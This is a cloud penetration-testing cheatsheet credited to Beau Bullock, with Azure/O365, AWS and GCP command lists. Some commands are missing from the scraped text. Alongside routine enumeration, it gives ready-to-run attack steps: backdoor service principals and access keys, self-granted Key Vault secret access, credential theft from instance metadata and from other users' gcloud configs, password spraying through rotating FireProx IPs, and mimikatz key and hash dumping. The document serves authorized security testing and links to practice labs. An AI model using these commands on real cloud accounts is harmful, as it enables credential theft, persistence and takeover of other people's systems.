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Cloud Pentesting Cheatsheet

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Cloud Pentesting Cheatsheet

by Beau Bullock (@dafthack)

The most updated version of this cheatsheet can be found here:


Microsoft Azure & O365 CLI Tool Cheatsheet

Az PowerShell Module

Import-Module Az



## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-AzAccount -Credential $credential

Import a context file

Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'

Export a context file

Save-AzContext -Path C:\Temp\AzureAccessToken.json

Account Information

List the current Azure contexts available

Get-AzContext -ListAvailable

Get context details

$context = Get-AzContext

List subscriptions


Choose a subscription

Select-AzSubscription -SubscriptionID "SubscriptionID"

Get the current user's role assignment


List all resources and resource groups


List storage accounts


WebApps & SQL

List Azure web applications


List SQL servers


Individual databases can be listed with information retrieved from the previous command

Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName

List SQL Firewall rules

Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName


List SQL Server AD Admins

Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName



List Azure Runbooks

Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -
ResourceGroupName <ResourceGroupName>

Export a runbook with:

Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName

$ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\

Virtual Machines
List VMs and get OS details

$vm = Get-AzVM -Name "VM Name"

Run commands on VMs

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId

RunPowerShellScript -ScriptPath ./powershell-script.ps1


List virtual networks


List public IP addresses assigned to virtual NICs


Get Azure ExpressRoute (VPN) Info


Get Azure VPN Info



Create a new Azure service principal as a backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -
RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password
in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal

MSOnline PowerShell Module

Import-Module MSOnline



## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-MsolService -Credential $credential

Account and Directory Information

List Company Information


List all users

Get-MSolUser -All

List all groups

Get-MSolGroup -All

List members of a group (Global Admins in this case)

Get-MsolRole -RoleName "Company Administrator"

Get-MSolGroupMember –GroupObjectId $GUID

List all user attributes

Get-MSolUser –All | fl

List Service Principals


One-liner to search all Azure AD user attributes for passwords

$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member |

foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like
"*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " :
" + $user.$prop)}}}

Az CLI Tool


az login

Dump Azure Key Vaults

List out any key vault resources the current account can view

az keyvault list –query '[].name' --output tsv

With contributor level access you can give yourself the right permissions to obtain secrets.
az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-
permissions get list --key-permissions get list --storage-permissions get list --
certificate-permissions get list

Get URI for Key Vault

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv

Get cleartext secret from keyvault

az keyvault secret show --id <URI from last command> | ConvertFrom-Json

Metadata Service URL

Get access tokens from the metadata service

01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true

Other Azure & O365 Tools


Azure security assessment tool


Look for open storage blobs

Invoke-EnumerateAzureBlobs -Base $BaseName

Export SSL/TLS certs

Get-AzPasswords -ExportCerts Y

Azure Container Registry dump



Azure security assessment tool



Framework to interact with Azure AD



Red team tool for graphing Azure and Azure AD objects



Tool to password spray Azure/O365


Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020

Amazon Web Services (AWS) CLI Tool Cheatsheet

Set AWS programmatic keys for authentication (use --profile= for a new profile)

aws configure

Open S3 bucket enumeration

List the contents of an S3 bucket

aws s3 ls s3://<bucketname>/

Download contents of bucket

aws s3 sync s3://bucketname s3-files-dir

Account Information

Get basic account info

aws sts get-caller-identity

List IAM users

aws iam list-users

List IAM roles

aws iam list-roles

List S3 buckets accessible to an account

aws s3 ls

Virtual Machines

List EC2 instances

aws ec2 describe-instances

WebApps & SQL

List WebApps

aws deploy list-applications


aws rds describe-db-instances --region <region name>

Knowing the VPC Security Group ID you can query the firewall rules to determine connectivity

aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>


List Lambda Functions

aws lambda list-functions --region <region>

Look at environment variables set for secrets and analyze code

aws lambda get-function --function-name <lambda function>


List EC2 subnets

aws ec2 describe-subnets

List ec2 network interfaces

aws ec2 describe-network-interfaces

List DirectConnect (VPN) connections

aws directconnect describe-connections


List access keys for a user

aws iam list-access-keys --user-name <username>

Backdoor account with second set of access keys

aws iam create-access-key --user-name <username>

Instance Metadata Service URL

Additional IAM creds possibly available here<IAM Role Name>

Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS and

curl --proxy vulndomain.target.com:80

data/iam/security-credentials/ && echo

IMDS Version 2 has some protections but these commands can be used to access it
TOKEN=`curl -X PUT "" -H "X-aws-ec2-metadata-
token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token:

Other AWS Tools



Run recon against all AWS services to enumerate access for a set of keys

python3 weirdAAL.py -m recon_all -t <name>


AWS exploitation framework


Install Pacu

sudo apt-get install python3-pip

git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
sudo bash install.sh

Import AWS keys for a specific profile

import_keys <profile name>

Detect if keys are honey token keys

run iam__detect_honeytokens

Enumerate account information and permissions

run iam__enum_users_roles_policies_groups
run iam__enum_permissions

Check for privilege escalation

run iam__privesc_scan

Google Cloud Platform CLI Tool Cheatsheet


Authentication with gcloud

#user identity login

gcloud auth login

#service account login

gcloud auth activate-service-account --key-file creds.json

List accounts available to gcloud

gcloud auth list

Account Information

Get account information

gcloud config list

List organizations

gcloud organizations list

Enumerate IAM policies set ORG-wide

gcloud organizations get-iam-policy <org ID>

Enumerate IAM policies set per project

gcloud projects get-iam-policy <project ID>

List projects

gcloud projects list

Set a different project

gcloud config set project <project name>

Gives a list of all APIs that are enabled in project

gcloud services list

Get source code repos available to user

gcloud source repos list

Clone repo to home dir

gcloud source repos clone <repo_name>

Virtual Machines

List compute instances

gcloud compute instances list

Get shell access to instance

gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"

Puts public ssh key onto metadata service for project

gcloud compute ssh <local host>

Get access scopes if on an instance

curl http://metadata.google.internal/computeMetadata/v1/instance/service-
accounts/default/scopes -H &#39;Metadata-Flavor:Google’

Use Google keyring to decrypt encrypted data

gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key

<crypto-key> --keyring <crypto-keyring> --location global

Storage Buckets

List Google Storage buckets

gsutil ls

List Google Storage buckets recursively

gsutil ls -r gs://<bucket name>

Copy item from bucket

gsutil cp gs://bucketid/item ~/

Webapps & SQL

List WebApps
gcloud app instances list

List SQL instances

gcloud sql instances list

gcloud spanner instances list
gcloud bigtable instances list

List SQL databases

gcloud sql databases list --instance <instance ID>

gcloud spanner databases list --instance <instance name>

Export SQL databases and buckets

First copy buckets to local directory

gsutil cp gs://bucket-name/folder/ .

Create a new storage bucket, change perms, export SQL DB

gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --
database=<database name>


List networks

gcloud compute networks list

List subnets

gcloud compute networks subnets list

List VPN tunnels

gcloud compute vpn-tunnels list

List Interconnects (VPN)

gcloud compute interconnects list


gcloud container clusters list

GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with
gcloud and run:

gcloud container clusters get-credentials <cluster name> --region <region>

If successful and the user has the correct permission the Kubernetes command below can be
used to get cluster info:

kubectl cluster-info


GCP functions log analysis – May get useful information from logs associated with GCP

gcloud functions list

gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>

Gcloud stores creds in ~/.config/gcloud/credentials.db Search home directories

sudo find /home -name "credentials.db

Copy gcloud dir to your own home directory to auth as the compromised user

sudo cp -r /home/username/.config/gcloud ~/.config

sudo chown -R currentuser:currentuser ~/.config/gcloud
gcloud auth list

Metadata Service URL

curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H
"Metadata-Flavor: Google"

Other Useful Cloud Tools and Techniques Cheatsheet

Multi-cloud security auditing tool

Install ScoutSuite

sudo apt-get install virtualenv

git clone https://github.com/nccgroup/ScoutSuite
cd ScoutSuite
virtualenv –p python3 venv
source venv/bin/activate
pip install –r requirements.txt

To run as root

sudo apt-get install virtualenv

sudo su
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite

Scan AWS environment with ScoutSuite

python scout.py aws --profile=<aws profile name>

or if installed...

scout aws --profile=<aws profile name>

Tool to search for public resources in AWS, Azure, and GCP


python3 cloud_enum.py -k <name-to-search>

Search repositories for secrets


Pull GitLeaks with Docker

sudo docker pull zricethezav/gitleaks

Print the help menu

sudo docker run --rm --name=gitleaks zricethezav/gitleaks --help

Use GitLeaks to search for secrets

sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r <repo URL>

TruffleHog - https://github.com/dxa4481/truffleHog

Shhgit - https://github.com/eth0izzle/shhgit

Gitrob - https://github.com/michenriksen/gitrob
Export Non-Exportable Private Keys From Web Server

mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export

Dump passwords hashes from SAM/SYSTEM files

mimikatz# lsadump::sam /system:SYSTEM /sam:SAM

Check Command History

Linux Bash History Location


Windows PowerShell PSReadLine Location


https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon Find on-prem ADConnect
account name and server

Get-NetUser -Filter "(samAccountName=MSOL_*)" |Select-Object name,description | fl

Password Spraying Azure/O365 while randomizing IPs with FireProx

git clone https://github.com/ustayready/fireprox
cd fireprox
virtualenv -p python3 .
source bin/activate
pip install -r requirements.txt
python fire.py

Launch FireProx

python fire.py --access_key <access_key_id> --secret_access_key <secret_access_key> --

region <region> --url https://login.microsoft.com --command create

Password spray using FireProx + MSOLSpray

Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020 -URL https://api-


Check a list of IP addresses against cloud provider IP space


Vulnerable Infrastructure Creation

Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat

SadCloud - https://github.com/nccgroup/sadcloud

Flaws Cloud - http://flaws.cloud

Thunder CTF - http://thunder-ctf.cloud

References and Resources

This is a list of references and resources that I leveraged to create the cheatsheets but it is not
Huge thanks to all the cloud pentesting blog/book authors & open source developers!

Rhino Security Labs @RhinoSecurity - Blog - Rhino Security Labs

Matt Burrough @mattburrough - Pentesting Azure Applications | No Starch Press

NCC Group @NCCGroupInfoSec - NCC Group Plc · GitHub

Sean Metcalf @PyroTek3 & Trimarc - AD Security

Karl Fosaaen @kfosaaen & NETSPI - NetSPI Blog

Ryan Hausknecht @haus3c & SpectorOps - Posts By SpecterOps Team Members

Steve Borosh @424f424f - rvrsh3ll Blog

Dirk-jan Mollema @_dirkjan - dirkjanm.io

Mike Felch @ustayready - ustayready (ustayready) · GitHub

Zachary Rice (@zricethezav) - zricethezav (Zachary Rice) · GitHub

Adam Chester @xpn - XPN InfoSec Blog

Chris Moberly @init_string & Gitlab - GitLab Security Department · GitLab

Lee Kagan @invokethreatguy & Lares - Blog | Resources | Lares Consulting, LLC

Oddvar Moe @Oddvarmoe & TrustedSec - Cybersecurity Education from the Experts |
TrustedSec Blog Posts

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